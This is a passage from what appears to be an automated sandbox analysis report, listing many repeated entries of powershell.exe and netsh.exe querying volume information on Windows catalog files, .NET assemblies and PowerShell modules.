            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (19 times)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (2 times)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (2 times)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (11 times)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
